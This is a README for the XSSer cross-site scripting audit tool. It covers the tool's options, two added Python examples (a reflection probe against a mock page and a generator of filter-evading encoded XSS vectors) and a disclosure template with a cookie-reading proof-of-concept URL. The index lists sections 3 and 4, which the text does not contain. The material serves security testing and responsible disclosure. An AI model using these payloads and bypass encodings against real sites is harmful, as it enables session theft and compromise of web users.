0.- Index:
===================
1.- Introduction
2.- Options and features
3.- Payloads
4.- Examples of usage
5.- How to XSS report to the Internet
6.- Documentation
7.- Downloads
====================================
1.- Introduction:
===================
Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect,
exploit and report XSS vulnerabilities in web-based applications.
It contains several options to try to detect and "bypass" certain filters,
and various special techniques of code injection.
====================================
2.- Options and features:
===================
xsser [OPTIONS] [-u <url> |-i <file> |-d <dork>] [-g <get> |-p <post> |-c <crawl>]
      [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]
*Options*:
--version
show program's version number and exit
-h, --help
show this help message and exit
-s, --statistics
show advanced statistics output results
-v, --verbose
activate verbose mode output results
--gtk
launch XSSer GTK Interface (Wizard included!)
*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with these extra
special features:
--imx=IMX
create a false image with XSS code embedded
--fla=FLASH
create a false .swf file with XSS code embedded
*Select Target(s)*:
At least one of these options has to be specified to set the source to get
target(s) urls from. You need to choose one to run XSSer:
-u URL, --url=URL
Enter target(s) to audit
-i READFILE
Read target urls from a file
-d DORK
Process search engine dork results as target urls
--De=DORK_ENGINE
Search engine to use with -d (yahoo, baidu, yandex, youdao, webcrawler,
google, etc. See dork.py file to check for available engines)
*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) we want to use as
the injection point for the payload.
-g GETDATA
Enter payload to audit using GET (ex: '/menu.php?q=')
-p POSTDATA
Enter payload to audit using POST (ex: 'foo=1&bar=')
-c CRAWLING
Number of urls to crawl on target(s): 1-99999
--Cw=CRAWLER_WIDTH
Depth level of crawler: 1-5
--Cl
Crawl only local target(s) urls (default TRUE)
*Configure Request(s)*:
These options can be used to specify how to connect to target(s) payload(s).
You can choose multiple:
--cookie=COOKIE
Change your HTTP Cookie header
--drop-cookie
Ignore Set-Cookie header from response
--user-agent=AGENT
Change your HTTP User-Agent header (default SPOOFED)
--referer=REFERER
Use another HTTP Referer header (default NONE)
--xforw
Set your HTTP X-Forwarded-For with random IP values
--xclient
Set your HTTP X-Client-IP with random IP values
--headers=HEADERS
Extra HTTP headers newline separated
--auth-type=ATYPE
HTTP Authentication type (Basic, Digest, GSS, NTLM)
--auth-cred=ACRED
HTTP Authentication credentials (name:password)
--proxy=PROXY
Use proxy server (tor: http://localhost:8118)
--ignore-proxy
Ignore system default HTTP proxy
--timeout=TIMEOUT
Select your timeout (default 30)
--retries=RETRIES
Retries when the connection times out (default 1)
--threads=THREADS
Maximum number of concurrent HTTP requests (default 5)
--delay=DELAY
Delay in seconds between each HTTP request (default 0)
--tcp-nodelay
Use the TCP_NODELAY option
--follow-redirects
XSSer will follow server redirection responses (302)
--follow-limit=FLI
Set how many times XSSer will follow redirections (default 50)
*Checker systems*:
These options are useful to know whether your target(s) have filters against
XSS attacks:
--Str
Use method String.fromCharCode()
--Une
Use unescape() function
--Mix
Mix String.fromCharCode() and unescape()
--Dec
Use Decimal encoding
--Hex
Use Hexadecimal encoding
--Hes
Use Hexadecimal encoding, with semicolons
--Dwo
Encode the vector's IP addresses as a DWORD
--Doo
Encode the vector's IP addresses in Octal
--Cem=CEM
Try -manually- different Character Encoding Mutations
(reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')
*Special Technique(s)*:
These options can be used to try to inject code using different types of
XSS techniques. You can choose multiple:
--Coo
COO - Cross Site Scripting Cookie injection
--Xsa
XSA - Cross Site Agent Scripting
--Xsr
XSR - Cross Site Referer Scripting
--Dcp
DCP - Data Control Protocol injections
--Dom
DOM - Document Object Model injections
--Ind
IND - HTTP Response Splitting Induced code
--Anchor
ANC - Use Anchor Stealth payloader (DOM shadows!)
--Phpids
PHP - Exploit PHPIDS bug (0.6.5) to bypass filters
*Select Final injection(s)*:
--Fp=FINALPAYLOAD
OWN - Insert your final code to inject -manually-
--Fr=FINALREMOTE
REMOTE - Insert your final code to inject -remotely-
--Doss
DOSs - XSS Denial of service (server) injection
--Dos
DOS - XSS Denial of service (client) injection
--B64
B64 - Base64 code encoding in META tag (rfc2397)
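The techniques above (COO, XSA, XSR) all rest on the same observation as the plain GET check: if a unique marker placed in a request field comes back in the response body byte-for-byte, that field is reflected without output encoding. The following script is an added example for this README, not XSSer's own code. It runs the check against a constructed in-process mock page (not a real application) so that it works offline; the injection-point names, the marker format and the mock's behaviour are assumptions made for illustration. Against a real target you would replace the mock with an HTTP client that sends the same fields.

```python
"""
Reflection probe for XSSer-style injection points: an ordinary GET
parameter plus the Cookie (COO), User-Agent (XSA) and Referer (XSR)
headers. Added example, not XSSer code; the target is a constructed mock.
"""
import html
import secrets
from typing import Callable, Dict

Request = Dict[str, str]           # request field name -> value
Handler = Callable[[Request], str]  # anything that turns a request into HTML

# Injection points, named after XSSer's technique flags (assumed mapping).
INJECTION_POINTS = {
    "GET": "q",            # -g '/search?q='
    "COO": "Cookie",       # --Coo
    "XSA": "User-Agent",   # --Xsa
    "XSR": "Referer",      # --Xsr
}


def mock_target(req: Request) -> str:
    """Constructed vulnerable page: reflects the search term, the
    User-Agent and the 'lang' cookie unescaped, but escapes the Referer
    correctly. Stands in for a real server so the probe runs offline."""
    cookie = req.get("Cookie", "")
    lang = cookie.split("lang=")[-1].split(";")[0] if "lang=" in cookie else "en"
    return (
        "<html><body>"
        f"<h1>Results for {req.get('q', '')}</h1>"
        f"<div id=ua>{req.get('User-Agent', '')}</div>"
        f"<div id=lang>{lang}</div>"
        f"<a href=\"{html.escape(req.get('Referer', ''), quote=True)}\">back</a>"
        "</body></html>"
    )


def build_request(point: str, payload: str) -> Request:
    """Put the payload into the field for the chosen injection point; every
    other field carries a benign value so only one point is tested."""
    req = {"q": "shoes", "Cookie": "lang=en", "User-Agent": "Mozilla/5.0",
           "Referer": "http://example.test/"}
    field = INJECTION_POINTS[point]
    req[field] = f"lang={payload}" if point == "COO" else payload
    return req


def probe(target: Handler, point: str) -> bool:
    """Inject a tag carrying a random marker and return True if the tag
    comes back unchanged, i.e. neither stripped nor entity-encoded. The
    random marker keeps an unrelated tag already on the page from causing
    a false positive."""
    marker = secrets.token_hex(4)
    probe_tag = f"<xsstest{marker}>"
    body = target(build_request(point, probe_tag))
    return probe_tag in body


def scan(target: Handler) -> Dict[str, bool]:
    """Probe every injection point and report which ones reflect unescaped."""
    return {point: probe(target, point) for point in INJECTION_POINTS}


if __name__ == "__main__":
    for point, vulnerable in scan(mock_target).items():
        state = "REFLECTED UNESCAPED" if vulnerable else "filtered/escaped"
        print(f"{point}: {state}")
```

Note what the Referer result shows: reflection alone is not a finding. The mock writes the Referer into an attribute through html.escape(..., quote=True), so the marker never comes back intact and the probe correctly reports that point as safe.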
*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in
vulnerable target(s).
You can select multiple and combine with your final code (except with DCP
code):
--Onm
ONM - Use onMouseMove() event to inject code
--Ifr
IFR - Use <iframe> source tag to inject code
*Miscellaneous*:
--silent
inhibit console output results
--update
check for XSSer latest stable version
--save
output all results directly to template (XSSlist.dat)
--xml=FILEXML
output 'positives' results to an XML file (--xml filename.xml)
--short=SHORTURLS
display -final code- shortened (tinyurl, is.gd)
--launch
launch a browser at the end of the injection(s)
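The Checker systems (--Str, --Une, --Mix, --Dec, --Hex, --Hes, --Dwo, --Doo, --Cem) and the --B64 final injection are all transformations of the same vector into a form that a keyword or blacklist filter no longer recognises while the browser still decodes it. The script below is an added example for this README, not XSSer's own code, and it does not claim to reproduce XSSer's exact output: the function names, the way --Mix is combined and the --Cem chaining are my own choices for illustration.

```python
"""
Character-encoding mutations of an XSS vector, in the spirit of the XSSer
checker and final-injection options. Added example, not XSSer code.
"""
import base64
from typing import Callable, Dict


def str_fromcharcode(js: str) -> str:
    """--Str: express the JavaScript as String.fromCharCode(codes...), so
    the payload carries no quotes or angle brackets for a filter to match."""
    codes = ",".join(str(ord(c)) for c in js)
    return f"eval(String.fromCharCode({codes}))"


def js_unescape(js: str) -> str:
    """--Une: %XX-encode every character and let unescape() decode it."""
    encoded = "".join(f"%{ord(c):02X}" for c in js)
    return f"eval(unescape('{encoded}'))"


def mix_str_une(js: str) -> str:
    """--Mix (my interpretation): %XX-encode, then hide the percent-encoded
    string itself behind String.fromCharCode()."""
    encoded = "".join(f"%{ord(c):02X}" for c in js)
    codes = ",".join(str(ord(c)) for c in encoded)
    return f"eval(unescape(String.fromCharCode({codes})))"


def html_decimal(vector: str) -> str:
    """--Dec: HTML decimal character references, e.g. &#60;script&#62;."""
    return "".join(f"&#{ord(c)};" for c in vector)


def html_hex(vector: str, semicolons: bool = False) -> str:
    """--Hex / --Hes: HTML hex references without or with the terminating
    semicolon. Browsers accept both; a filter that only knows one form is
    bypassed by the other."""
    term = ";" if semicolons else ""
    return "".join(f"&#x{ord(c):x}{term}" for c in vector)


def ip_to_dword(ip: str) -> str:
    """--Dwo: dotted quad as one 32-bit decimal; browsers resolve
    http://2130706433/ to 127.0.0.1, defeating naive host blacklists."""
    octets = [int(x) for x in ip.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"not an IPv4 address: {ip!r}")
    a, b, c, d = octets
    return str((a << 24) | (b << 16) | (c << 8) | d)


def ip_to_octal(ip: str) -> str:
    """--Doo: each octet as a zero-prefixed octal literal (0177.00.00.01)."""
    return ".".join(f"0{int(x):o}" for x in ip.split("."))


def meta_refresh_b64(html_payload: str) -> str:
    """--B64: wrap the payload in an RFC 2397 data: URI inside a META
    refresh, so the injected vector contains no <script> text at all."""
    b64 = base64.b64encode(html_payload.encode()).decode()
    return f'<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,{b64}">'


# --Cem: chain mutations by name, applied left to right, e.g. "Une,Str".
MUTATIONS: Dict[str, Callable[[str], str]] = {
    "Str": str_fromcharcode,
    "Une": js_unescape,
    "Mix": mix_str_une,
    "Dec": html_decimal,
    "Hex": html_hex,
    "Hes": lambda v: html_hex(v, semicolons=True),
}


def apply_mutations(vector: str, cem: str) -> str:
    """Apply a comma-separated list of mutation names in order."""
    for name in cem.split(","):
        name = name.strip()
        if name not in MUTATIONS:
            raise KeyError(f"unknown mutation {name!r}")
        vector = MUTATIONS[name](vector)
    return vector


if __name__ == "__main__":
    js = "alert(1)"
    print(str_fromcharcode(js))
    print(js_unescape(js))
    print(apply_mutations(js, "Une,Str"))
    print(html_decimal("<script>"), html_hex("<script>"), html_hex("<script>", True))
    print(ip_to_dword("127.0.0.1"), ip_to_octal("127.0.0.1"))
    print(meta_refresh_b64("<script>alert(1)</script>"))
```

The value of running each mutation separately, as the checker options do, is diagnostic: a target that blocks `<script>` but passes `&#x3c;script&#x3e;` into an attribute context tells you the filter operates on the raw request rather than on the decoded output, which is exactly the kind of filter the bypassers are meant to expose.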
====================================
5.- How to XSS report to the Internet:
===================
If you want to report an XSS vulnerability in a piece of software to the
global Internet, you can send an email directly to an open security mailing
list. The most common ones are (of course, there are others):
- Bugtraq:
bugtraq@securityfocus.com
- FD:
full-disclosure@lists.grok.org.uk
If you have never sent a security report before, check this template:
---------------- cut here ---------------------------
Subject:
<name of software> <version> <== Cross Site <reflected/persistent> Scripting
----
1. OVERVIEW
The <name of software> <version> and lower versions are vulnerable to Cross
Site Scripting.
2. BACKGROUND
<name of software>
<description of software>
3. VULNERABILITY DESCRIPTION
<description of vulnerability>
- example:
The 'Target' parameter is not properly sanitized after the user logs in,
which allows an attacker to conduct a Cross Site Scripting attack.
An attacker could prepare a link in a forum post that points to a file
which seems to require authentication. Upon logging in, the user gets XSSed.
4. VERSIONS AFFECTED
<version> and lower
5. PROOF-OF-CONCEPT/EXPLOIT
http://target.com/index.php?p=/entry/signin&Target=javascript:alert(document.cookie)//http://
6. SOLUTION
Upgrade to <name of software> <version> or higher
7. VENDOR
<name of vendor>: http://vendor.com/
8. CREDIT
This vulnerability was discovered by: <data about researcher>
9. DISCLOSURE TIME-LINE
- example:
2010-12-14: notified vendor
2011-01-18: vendor released fix
2011-01-27: vulnerability disclosed
10. REFERENCES
Original Advisory URL:
http://researcher.website.org/lab/vulnerability_founded
- XSS FAQs: http://www.cgisecurity.com/articles/xss-faq.shtml
- XSS (wiki): http://en.wikipedia.org/wiki/Cross-site_scripting
- XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
---------------- cut here ---------------------------
It is important to add to the report the tools you used in your research
to discover the vulnerabilities.
For example, you can add another section mentioning them, like this:
----------
?. TOOLS
This vulnerability was discovered using XSSer Swarm Edition!
More info: http://xsser.sf.net
----------
This info can be very useful for developers and other researchers of
security tools.
====================================
6.- Documentation:
===================
Slides: XSSer "The Mosquito" - 2011
- http://xsser.sourceforge.net/xsser/XSSer_the_mosquito_2011.pdf
XSS for fun and profit - conference SCG/09 - PDF (184 pages)
+ English Version:
- http://xsser.sourceforge.net/xsser/XSS_for_fun_and_profit_SCG09_(english).pdf
+ Spanish Version:
- http://xsser.sourceforge.net/xsser/XSS_for_fun_and_profit_SCG09_(spanish).pdf
URL Generation Schema (a schema of how XSSer injects code)
- http://xsser.sourceforge.net/xsser/url_generation.png
There are also some videos about "how to use XSSer" on the Internet:
- http://xsser.blip.tv
====================================
7.- Downloads:
===================
XSSer (official version) can be downloaded from its SourceForge File List page:
- http://sourceforge.net/projects/xsser/files/
You can also check out the latest development version from the XSSer
-Subversion- repository:
$ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser
For more details, check the main website:
- http://xsser.sf.net